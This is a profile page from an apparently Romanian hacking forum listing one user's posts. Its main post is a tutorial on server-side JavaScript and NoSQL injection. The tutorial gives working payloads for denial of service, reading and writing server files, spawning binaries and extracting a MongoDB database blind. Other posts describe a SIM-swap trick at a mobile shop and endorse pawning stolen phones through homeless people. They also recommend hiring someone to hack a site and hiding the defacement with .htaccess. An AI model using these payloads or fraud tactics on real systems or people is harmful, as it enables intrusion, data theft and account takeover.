Jump to content

Kalashnikov.

Active Members
  • Posts

    456
  • Joined

  • Last visited

Everything posted by Kalashnikov.

  1. vedeti pe level-23 aveti acolo cryptere fud // scuze, nu am vazut ca domeniul level-23.co a expirat
  2. Flood Yahoo! Messenger Started by [boT] sz0ne e un but in php care foloseste functia curl sa descarce feed-ul unui site si posteaza in acea categorie, inca mai filtrez posturi de prost gust. imi cer scuze eu pentru ghosthck. // cer tc
  3. Da ba, accept critici dar sa fie argumentate, nu sau se cred destepti. Nu vorbesc corect cand alti sunt retardati. tedeus, nu te injur deoarece ti-ai argumentat ideea. Daca vreti sa ma injurati, astept PM-uri, dar nu aici in post.
  4. anthore fucking retard. E o rusine sa muncesti ? Astia voi, generatia mc donald care vreti sa faceti banii din adf.ly si bux-uri sunteti niste retardati. Gandesti inainte sa dai submit la un post? Daca veniti aici doar sa ma luati peste picior ca joc nu stiu ce joc , stati in banca voastra.
  5. Daca aveti idei revolutionare (realizabile) care se pot face in PHP, VB.Net, si chiar si jocuri in C# imi lasati pm. Prin mediu asta, vreau sa va zic si ca: Cautam o echipa de moderatori pe forum. De profit discutam dupa 5-10 luni de la deschidere. Hostul la forum e platit pe 6 luni, dupa il platesc pe urmatorul an.
  6. Nytro, ?tiu pe unu care fura telefoane... Ia dat 50 de lei unui boschetar de pe strada s? mearga cu mai multe telefoane s? le bage la amanet. Se poate aplica chestia asta ?i în cazul celor de la orange, îi g?si?i pe la p?c?nele pe boschetari, ies de acolo f?r? bani.
  7. M? plictisisem într-o zi, ?i mi-am pus in cap s? fac un test de inginerie sociala cu orange (acum 2 saptamani). Am luat num?rul de telefon al unui prieten ?i m-am dus la un shop orange. - Bun? ziua, am pierdut un telefon cu cartela în el. A?i putea s? îmi da?i alt? cartela ? - Desigur (blablablabla), dar exist? o tax? de 10 lei pentru o cartel? nou? cu accela?i num?r Bun am pl?tit, ?i spre surprinderea mea mi-au dat o cartel? cu num?rul prietenului. Face?i-v? de cap. P.S: înv?ta?i num?rul de telefon, s? par? c? este al vostru acel num?r.
  8. ma, am aplicat asta iar adminul nu si-a dat seama 1 saptamana ca nu a intrat nimeni ))))) ideea e sa tina deface-u cat mai mult. nici una, dar e mai ieftin sa platesti pe cineva sa ii sparga siteul decat sa platesti ep cienva sa il tina jos 4-5 luni.
  9. This tutorial represents a tutorial regarding attack on javascript on servers with NoSql or node.js .JavaScript has been widely used on web application client-side tiers (i.e. in code executing in the user?s browser) for years in order to provide a richer, more “desktoplike” user experience. But in recent years, there has been a surge of interest in JavaScript not just for client-side code, but for server-side code as well. There are now server-side JavaScript (or SSJS) features in database servers (CouchDB for example), file servers (Opera Unite), and web servers (Node.js). While there can be substantial benefits of moving to SSJS, one serious drawback exists in that script injection vulnerabilities that can be exploited to execute on the server are just as easy to accidentally introduce into server-side application code as they are for client-side code; and furthermore, the effects of server-side JavaScript injection are far more critical and damaging. Client-side JavaScript injection vulnerabilities are better known as their much more common name “cross-site scripting” (or XSS). The effects of XSS vulnerabilities can be very damaging: XSS has been responsible for session hijacking/identity theft (theft of session and/or authentication cookies from the DOM); phishing attacks (injection of fake login dialogs into legitimate pages on the host application); keystroke logging; and webworms (MySpace/Samy ) . One of the reasons XSS is so prevalent is that it?s so easily accidentally introduced into application code. Consider this block of client-side avaScript code intended to process stock quote requests. (The code uses JSON as the message format and XMLHttpRequest as the request object.) <html> … <script> var xhr = new XMLHttpRequest(); xhr.onreadystatechange = function() { if ((xhr.readyState == 4) && (xhr.status == 200)) { var stockInfo = eval('(' + xhr.responseText + ')'); alert('The current price of ' + stockInfo.symbol + ' is $' + stockInfo.price); } } function makeRequest(tickerSymbol) { xhr.open("POST","stock_service",true); xhr.send("{\"symbol\" : \"" + tickerSymbol + "\"}"); } </script> … <html> This code looks straightforward but the call to eval potentially introduces a serious vulnerability. If an attacker were able to influence the response coming from the stock service to inject script code, the call to eval would execute that script code in the victim?s browser context. The attacker?s most likely move at this point would be to extract any authentication or session cookies from the page DOM and send them back to himself, so that he could assume the identity of the victim and take over his session. A NEW VECTOR : SERVER SIDE JAVASCRIPT INJECTION Now consider a very similar block of JavaScript code designed to parse JSON requests, except that this code is executing on the server tier to implement a node.js web server. var http = require('http'); http.createServer(function (request, response) { if (request.method === 'POST') { var data = ''; request.addListener('data', function(chunk) { data += chunk; }); request.addListener('end', function() { var stockQuery = eval("(" + data + ")"); getStockPrice(stockQuery.symbol); … }); The same line of code (eval of the incoming JSON data) is responsible for an injection vulnerability in this snippet as in the previous client-side example. However, in this case, the effects of the vulnerability are much more severe than a leak of a victim?s cookies. For example, assume in this case that a legitimate, non-malicious JSON message to the stock quote service looks like this: {"symbol" : "AMZN"} The call to eval then evaluates the string: ({"symbol" : "AMZN"}) However, in this case there is nothing to prevent an attacker from simply sending his own JavaScript code in place of the normal JSON message. For example, he could send: response.end('success') The server code would then execute this injected command and return the text “success” as the body of the HTTP response. If an attacker sends this probing request and receives “success” as the response, he knows that the server will execute his arbitrarily supplied JavaScript, and he can proceed to send some more damaging attacks. Cool attacks using this technique : 1.DoS attack An effective denial-of-service attack can be executed simply by sending the command: while(1) This attack will cause the target server to use 100% of its processor time to process the infinite loop. The server will hang and be unable to process any other incoming requests until an administrator manually restarts the process.It?s worth noting how asymmetric this DoS attack is. The attacker doesn?t need to flood the target with millions of requests; instead, only a single HTTP request with an eight-byte payload is sufficient to disable the target. 2.File System Access Another potential goal of an attacker might be to read the contents of files from the local system. Node.js (as well as some NoSQL database engines such as CouchDB) use the CommonJS API; file system access is supported by including (via the require keyword) the “fs” module: var fs = require('fs'); New modules can be require?d in at any time, so if the currently running script did not originally include file system access functionality (for example), an attacker can simply add that functionality in by including the appropriate require command along with his attack payload. The following attacks list the contents of the current directory and parent directory respectively: response.end(require('fs').readdirSync('.').toString()) response.end(require('fs').readdirSync('..').toString()) From here, it is a simple matter to build a complete directory structure of the entire file system. To list the actual contents of a file, the attacker would issue the following command: response.end(require('fs').readFileSync(filename)) However, not only can the attacker read the contents of files, he can also write to them as well. This attack prepends the string “hacked” to the start of the currently executing file – although, of course, much more malicious attacks would be possible. var fs = require('fs'); var currentFile = process.argv[1]; fs.writeFileSync(currentFile, 'hacked' + fs.readFileSync(currentFile)); Finally, we note that it is also possible to create arbitrary files on the target server, including binary executable files: require('fs').writeFileSync(filename,data,'base64'); where filename is the name of the resulting file (i.e. “myfileexe”) and data is the base-64 encoded contents that will be written to the new file. The attacker now only needs a way to execute this binary on the server, which will be demonstrated next . 3.Execution of Binary Files Now that the attacker has written his attack binary to the server, he needs to execute it. The final demonstration of server-side JavaScript injection exploit payloads shows how he can accomplish this. require('child_process').spawn(filename); At this point, any further exploits are limited only by the attacker?s imagination. 4.NoSql injection Server-side JavaScript injection vulnerabilities are not limited to just eval calls inside of node.js scripts. NoSQL database engines that process JavaScript containing userspecified parameters can also be vulnerable. MongoDB, for example, supports the use of JavaScript functions for query specifications and map/reduce operations. Since MongoDB databases (like other NoSQL databases) do not have strictly defined database schemas, using JavaScript for query syntax allows developers to write arbitrarily complex queries against disparate document structures.For example, let?s say we have a MongoDB collection that contains some documents representing books, some documents representing movies, and some documents representing music albums. This JavaScript query function will select all the documents in the specified collection that were either written, filmed, or recorded in the specified year: function() { var search_year = input_value; return this.publicationYear == search_year || this.filmingYear == search_year || this.recordingYear == search_year; } If the application developer were building this application in PHP (for example), the source code might look like this: $query = 'function() {var search_year = \'' . $_GET['year'] . '\';' .'return this.publicationYear == search_year || ' . ' this.filmingYear == search_year || ' . ' this.recordingYear == search_year;}'; $cursor = $collection->find(array('$where' => $query)); This code uses the value of the request parameter “year” as the search parameter. However, just as in a traditional SQL injection attack, since the query syntax is being constructed in an ad-hoc fashion (i.e. query syntax concatenated along with user input), this code is vulnerable to a server-side JavaScript injection attack. For example, this request would be an effective DoS attack against the system: http://server/app.php?year=1995';while(1);var%20foo='bar 4.Blind NoSql Injection Another possible attack vector when using SSJS injection attacks against NoSQL databases is the use of blind NoSQL injection to extract out the entire contents of the NoSQL database. To demonstrate how this attack might work, let?s continue the MongoDB example given earlier. To execute any kind of successful blind injection attack, the attacker needs to see a difference in the server?s response to a true condition versus its response to a false condition. This is trivial to accomplish via SSJS injection, in fact even more trivial than the classic “OR 1=1” SQL injection attack: http://server/app.php?year=1995';return(true);var%20foo='bar http://server/app.php?year=1995';return(false);var%20foo='bar If there is any difference in the server?s response between these two injections, then the attacker can now “ask” the server any true/false “question”, and by asking enough questions he will be able to extract out the entire contents of the database. The first question to ask is, How many collections are in the database?, or more precisely, Is there exactly one collection in the database?, or Are there exactly two collections in the database?, etc: return(db.getCollectionNames().length == 1); return(db.getCollectionNames().length == 2); Once the attacker has established how many collections exist, the next step is to determine their names. He checks each collection name in the array, first to determine the length of the name, and then to determine the name itself one character at a time: return(db.getCollectionNames()[0].length == 1); return(db.getCollectionNames()[0].length == 2); return(db.getCollectionNames()[0][0] == 'a'); return(db.getCollectionNames()[0][0] == 'b'); Once the collection names have been extracted, the next step is to get the collection data. Again, the attacker first needs to determine how many documents are in each collection (in this example the name of the first collection is “foo”): return(db.foo.find().length == 1); return(db.foo.find().length == 2); In a traditional blind SQL injection attack, the next step at this point would be to determine the column structure of each table. However, the concept of column structure does not have meaning for NoSQL database documents that lack a common schema. Every document in the collection could have a completely different structure from every other document. However, this fact won?t prevent extraction of the database contents. The attacker simply calls the “tojsononeline” method to return the document content as a JSON string, then extracts that data one character at a time: return(tojsononeline(db.foo.find()[0]).length == 1); return(tojsononeline(db.foo.find()[0]).length == 2); return(tojsononeline(db.foo.find()[0])[0] == 'a'); return(tojsononeline(db.foo.find()[0])[0] == 'b'); Eventually, this method will produce the entire contents of every document in every collection in the database. SOURCE : BlackHat Conference USA
  10. Pe paypal banii vor fi trimisi ca si gift. Nu dau primul. Intai banii si dupa primiti contul. de ce, tie frica sa nu ceara refund? Ce rost are sa dai teapa mai ales pentru 5 euro amarati... Bafta la vanzarii de ce le vinzi pentru 5 euro amarati?
  11. de modificat in titlu: Tutorial instalare server apache pe debian
  12. Platesti pe cineva sa iti ia access la site, tu ii bagi un .htaccess unde permiti accesul doar adminilor de acolo iar al vizitatorilor il restrictionezi. Simplu ca la carte
  13. Tu ce server http folosesti pe serverul tau ? de ce? // eu Folosesc lighttpd cu memcached, cred ca e cea mai buna alegere (pentru mine), se incarca paginile instant .
  14. Mi-am facut si eu cont sub refferalul tau, sa vedem . // s-a activat, acum incepe treaba.
  15. Pentru cei care nu se descurca cu engleza --> https://rstforums.com/forum/68389-domenii-gratuit-com-net-org.rst Doar ca luati card free de pe entropay.com
  16. Tedeus, garryone are dreptate. Nu are importan?? trafic-ul / flood-ul care îl iei atât timp cât i?i alegi un host potrivit. Eu î?i recomand s? cau?i prima dat? dup? teme, s? nu faci gre?eala s? alegi cms-ul iar s? nu g?se?ti o tem? potrivit?.
  17. Nick-ul meu vine de la Kalashnikov (ak-47).
×
×
  • Create New...